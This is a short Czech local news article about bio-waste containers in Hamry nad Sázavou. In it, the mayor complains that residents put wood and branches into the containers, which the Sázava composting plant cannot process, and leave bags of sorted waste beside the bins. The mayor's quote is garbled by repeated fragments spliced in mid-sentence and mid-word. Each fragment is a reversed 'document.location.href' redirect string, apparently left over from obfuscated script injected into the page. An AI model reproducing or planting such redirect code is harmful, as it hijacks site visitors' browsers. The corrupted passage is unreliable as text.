Rainbow page separator

Do bioodpadu dřevo nepatří, kompostárna ho nezvládne zpracovat

Pondělí, 15. května 2017

Hamry nad Sázavou / Velkoobjemové kontejnery na bioodpad byly rozmístěny v několika místech obce. Okamžitě se začaly plnit, nicméně jako problém se projevila skutečnost, že do nich někteří lidé ukládali také větve a další dřevěné zbytky ze svých zahrad.
„Kompostárna v Sázavě není schopná zpracovat dřevní hmotu, mají tam s takovým obsahem kontejnerů velké problémy. Je třeba, aby [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu lidé věnovali pozornost, a větve, dřevo a velkoobjemový odpad do těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kontejnerů neukládali,“ vyjádřil se starosta Hamrů nad Sázavou Hubert Křesťan. Připomněl i další nešvar obyvatel při třídění odpadů, jímž jsou pytle naplněné papírem, plasty nebo sklem, které lidé pouze položí před příslušný barevně označený kontejner, namís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to aby odpad vsunuli dovnitř.